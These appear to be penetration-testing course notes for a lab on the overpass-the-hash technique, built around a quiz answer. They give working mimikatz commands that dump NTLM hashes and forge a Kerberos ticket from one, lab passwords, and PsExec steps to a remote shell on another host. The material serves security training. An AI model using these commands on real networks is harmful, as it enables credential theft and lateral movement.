Topics: Overpass the Hash
# Questions
Start VM Group 1 and repeat the steps discussed in this section. Which command is used to inspect the current TGT available for the running user?
# Answer
klist

# With overpass the hash, we can "over" abuse an NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT). Then we can use the TGT to obtain a Ticket Granting Service (TGS).

# Login to Windows 10 CLIENT76 machine as jeff and run a process as jen which prompt authentication
# The simplest way to do this is to right-click the Notepad icon on the desktop then shift left-click "show more options" on the popup, yielding the options. 

xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.195.76

# Enter jen as the username along with the associated password, which will launch Notepad in the context of that user. 
jen:Nexus123!

# We can validate this by opening an Administrative shell and using mimikatz with the sekurlsa::logonpasswords command. The command will dump the cached password hashes.
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
...
* Username : jen
* Domain   : CORP
* NTLM     : 369def79d8372408bf6e93364cc93075
...

# The essence of the overpass the hash lateral movement technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is with the sekurlsa::pth command from Mimikatz.

# The command requires a few arguments and creates a new PowerShell process in the context of jen. This new PowerShell prompt will allow us to obtain Kerberos tickets without performing NTLM authentication over the network, making this attack different than a traditional pass-the-hash.

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell 

# At this point, we have a new PowerShell session that allows us to execute commands as jen.
# Let's list the cached Kerberos tickets with klist.
PS C:\Windows\system32> klist
Current LogonId is 0:0x1583ae
Cached Tickets: (0)

# No Kerberos tickets have been cached, but this is expected since jen has not yet performed an interactive login. Let's generate a TGT by authenticating to a network share on the files04 server with net use.
PS C:\Windows\system32> net use \\files04

PS C:\Windows\system32> klist
...
        Server: krbtgt/CORP.COM @ CORP.COM
        Server: cifs/files04 @ CORP.COM
...

# The output has the Kerberos tickets, including the TGT and a TGS for the Common Internet File System (CIFS) service. We know that ticket #0 is a TGT because the server is krbtgt.

# We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM). Here we will use the official PsExec application from Microsoft.

# PsExec can run a command remotely but does not accept password hashes. Since we have generated Kerberos tickets and operate in the context of jen in the PowerShell session, we can reuse the TGT to obtain code execution on the files04 host.
PS C:\Windows\system32> cd C:\Tools\SysinternalsSuite\
PS C:\Tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd

C:\Windows\system32>whoami
corp\jen
C:\Windows\system32>hostname
FILES04

